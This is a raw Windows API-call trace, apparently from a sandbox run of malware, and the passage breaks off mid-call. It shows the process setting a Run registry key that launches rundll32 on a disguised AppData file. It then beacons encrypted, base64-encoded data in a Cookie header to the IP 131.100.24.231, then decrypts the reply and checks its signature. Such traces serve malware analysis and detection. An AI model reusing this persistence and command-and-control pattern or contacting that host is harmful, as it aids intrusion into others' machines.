GetProcessHeap () returned 0x530000 [0386.270] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0386.270] GetProcessHeap () returned 0x530000 [0386.271] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0386.271] GetProcessHeap () returned 0x530000 [0386.271] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b59e28 | out: hHeap=0x530000) returned 1 [0386.271] GetProcessHeap () returned 0x530000 [0386.271] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0386.271] GetProcessHeap () returned 0x530000 [0386.271] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0386.271] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0386.271] GetProcessHeap () returned 0x530000 [0386.271] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83ae0 [0386.272] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",xtlmEUMiTSPmlAQ") returned 105 [0386.272] GetProcessHeap () returned 0x530000 [0386.272] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83ae0 | out: hHeap=0x530000) returned 1 [0386.272] GetProcessHeap () returned 0x530000 [0386.272] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0386.272] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x658, lpdwDisposition=0x0) returned 0x0 [0386.274] GetProcessHeap () returned 0x530000 [0386.274] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0386.274] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",xtlmEUMiTSPmlAQ") returned 105 [0386.274] RegSetValueExW (in: hKey=0x658, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",xtlmEUMiTSPmlAQ", cbData=0xd4 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",xtlmEUMiTSPmlAQ") returned 0x0 [0386.275] RegCloseKey (hKey=0x658) returned 0x0 [0386.275] GetProcessHeap () returned 0x530000 [0386.275] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c710 | out: hHeap=0x530000) returned 1 [0386.275] GetProcessHeap () returned 0x530000 [0386.276] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0386.276] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xed9b9) returned 0x102 [0396.602] GetProcessHeap () returned 0x530000 [0396.603] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0396.603] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0396.603] GetProcessHeap () returned 0x530000 [0396.603] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0396.603] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0396.603] GetProcessHeap () returned 0x530000 [0396.603] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0396.603] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0396.603] GetProcessHeap () returned 0x530000 [0396.603] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0396.603] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83ae0 [0396.604] FindNextFileW (in: hFindFile=0x2a83ae0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0396.605] FindNextFileW (in: hFindFile=0x2a83ae0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0396.605] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0396.605] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0396.605] FindNextFileW (in: hFindFile=0x2a83ae0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0396.605] FindClose (in: hFindFile=0x2a83ae0 | out: hFindFile=0x2a83ae0) returned 1 [0396.605] GetProcessHeap () returned 0x530000 [0396.605] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0396.605] GetProcessHeap () returned 0x530000 [0396.606] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0396.606] GetProcessHeap () returned 0x530000 [0396.606] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc8a0 [0396.606] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0397.190] GetProcessHeap () returned 0x530000 [0397.190] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0397.190] GetProcessHeap () returned 0x530000 [0397.191] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc8a0 | out: hHeap=0x530000) returned 1 [0397.191] GetProcessHeap () returned 0x530000 [0397.191] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62ea0 [0397.191] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0397.191] GetProcessHeap () returned 0x530000 [0397.191] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62ea0 | out: hHeap=0x530000) returned 1 [0397.191] GetProcessHeap () returned 0x530000 [0397.191] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0397.191] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0397.191] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0397.191] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0397.191] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0397.191] GetProcessHeap () returned 0x530000 [0397.192] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0397.192] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0397.192] GetProcessHeap () returned 0x530000 [0397.192] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76350 [0397.192] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76350, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0397.192] GetProcessHeap () returned 0x530000 [0397.192] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0397.192] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76350, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0397.192] GetProcessHeap () returned 0x530000 [0397.192] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x11a) returned 0x2a49848 [0397.192] GetProcessHeap () returned 0x530000 [0397.192] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0397.192] GetProcessHeap () returned 0x530000 [0397.193] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0397.193] CryptBinaryToStringW (in: pbBinary=0x2a49848, cbBinary=0x11a, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0397.193] GetProcessHeap () returned 0x530000 [0397.193] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f2) returned 0x2b3ec28 [0397.193] CryptBinaryToStringW (in: pbBinary=0x2a49848, cbBinary=0x11a, dwFlags=0x40000001, pszString=0x2b3ec28, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgN35cK4x/YAwzsFbfMtzOoy5oLiw1RtYP4uLFzjRj+Xq548q2zC2v+FyaowvR0yxE5Kk8SXmH+TSaVRL3l5n+Xcpb4HqlWd4cr2/fcUeok2gvfY5esQRVY4Sw3BpGRqpVmJ23Haq+uYfqCkx15P0r0hBCSSOFT3OJgr", pcchString=0x2cf504) returned 1 [0397.193] GetProcessHeap () returned 0x530000 [0397.193] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0397.193] GetProcessHeap () returned 0x530000 [0397.193] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e50 [0397.194] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: rIkrcSBIJQpjp=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgN35cK4x/YAwzsFbfMtzOoy5oLiw1RtYP4uLFzjRj+Xq548q2zC2v+FyaowvR0yxE5Kk8SXmH+TSaVRL3l5n+Xcpb4HqlWd4cr2/fcUeok2gvfY5esQRVY4Sw3BpGRqpVmJ23Haq+uYfqCkx15P0r0hBCSSOFT3OJgr\r\n") returned 400 [0397.194] GetProcessHeap () returned 0x530000 [0397.194] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e50 | out: hHeap=0x530000) returned 1 [0397.194] GetProcessHeap () returned 0x530000 [0397.194] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b3ec28 | out: hHeap=0x530000) returned 1 [0397.194] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0397.195] GetProcessHeap () returned 0x530000 [0397.195] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0397.195] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0397.197] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="XUTJxlmFENzNsUqZvdcBnfTMraHDnrhQTVonROhDRzsJXIWfuBdHAGRSxkZD", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0397.198] GetProcessHeap () returned 0x530000 [0397.198] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0397.198] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0397.198] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0397.198] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0397.198] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: rIkrcSBIJQpjp=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgN35cK4x/YAwzsFbfMtzOoy5oLiw1RtYP4uLFzjRj+Xq548q2zC2v+FyaowvR0yxE5Kk8SXmH+TSaVRL3l5n+Xcpb4HqlWd4cr2/fcUeok2gvfY5esQRVY4Sw3BpGRqpVmJ23Haq+uYfqCkx15P0r0hBCSSOFT3OJgr\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0398.444] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0398.444] GetProcessHeap () returned 0x530000 [0398.444] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0398.444] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x3c0) returned 1 [0398.445] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b481c0, dwNumberOfBytesToRead=0xfc40, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b481c0*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0398.445] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0398.445] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0398.445] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0398.445] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0398.445] GetProcessHeap () returned 0x530000 [0398.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76350 [0398.445] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76350, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76350, pcbResult=0x2cf51c) returned 0x0 [0398.445] GetProcessHeap () returned 0x530000 [0398.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0398.445] GetProcessHeap () returned 0x530000 [0398.445] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc8a0 [0398.445] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0398.446] GetProcessHeap () returned 0x530000 [0398.446] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0398.446] GetProcessHeap () returned 0x530000 [0398.446] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc8a0 | out: hHeap=0x530000) returned 1 [0398.446] GetProcessHeap () returned 0x530000 [0398.446] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63080 [0398.446] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0398.446] GetProcessHeap () returned 0x530000 [0398.446] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63080 | out: hHeap=0x530000) returned 1 [0398.447] GetProcessHeap () returned 0x530000 [0398.447] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0398.447] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0398.447] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76398, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0398.447] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0398.447] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0398.447] GetProcessHeap () returned 0x530000 [0398.447] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0398.447] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0398.447] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76354, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0398.449] GetProcessHeap () returned 0x530000 [0398.449] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c690 [0398.449] GetProcessHeap () returned 0x530000 [0398.449] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0398.449] GetProcessHeap () returned 0x530000 [0398.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0398.450] GetProcessHeap () returned 0x530000 [0398.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a49848 | out: hHeap=0x530000) returned 1 [0398.450] GetProcessHeap () returned 0x530000 [0398.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0398.450] GetProcessHeap () returned 0x530000 [0398.450] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0398.450] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0398.451] GetProcessHeap () returned 0x530000 [0398.451] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a838e0 [0398.451] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",oOMLQWAePTdFU") returned 103 [0398.451] GetProcessHeap () returned 0x530000 [0398.451] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a838e0 | out: hHeap=0x530000) returned 1 [0398.451] GetProcessHeap () returned 0x530000 [0398.451] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76350 [0398.451] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x628, lpdwDisposition=0x0) returned 0x0 [0398.451] GetProcessHeap () returned 0x530000 [0398.452] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0398.452] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",oOMLQWAePTdFU") returned 103 [0398.452] RegSetValueExW (in: hKey=0x628, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",oOMLQWAePTdFU", cbData=0xd0 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",oOMLQWAePTdFU") returned 0x0 [0398.452] RegCloseKey (hKey=0x628) returned 0x0 [0398.453] GetProcessHeap () returned 0x530000 [0398.453] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c690 | out: hHeap=0x530000) returned 1 [0398.453] GetProcessHeap () returned 0x530000 [0398.453] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0398.453] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xeb9c2) returned 0x102 [0408.459] GetProcessHeap () returned 0x530000 [0408.459] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0408.459] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0408.459] GetProcessHeap () returned 0x530000 [0408.459] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0408.459] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0408.459] GetProcessHeap () returned 0x530000 [0408.459] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0408.460] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0408.460] GetProcessHeap () returned 0x530000 [0408.460] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0408.460] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a838e0 [0408.462] FindNextFileW (in: hFindFile=0x2a838e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0408.462] FindNextFileW (in: hFindFile=0x2a838e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0408.462] PathFindFileNameW 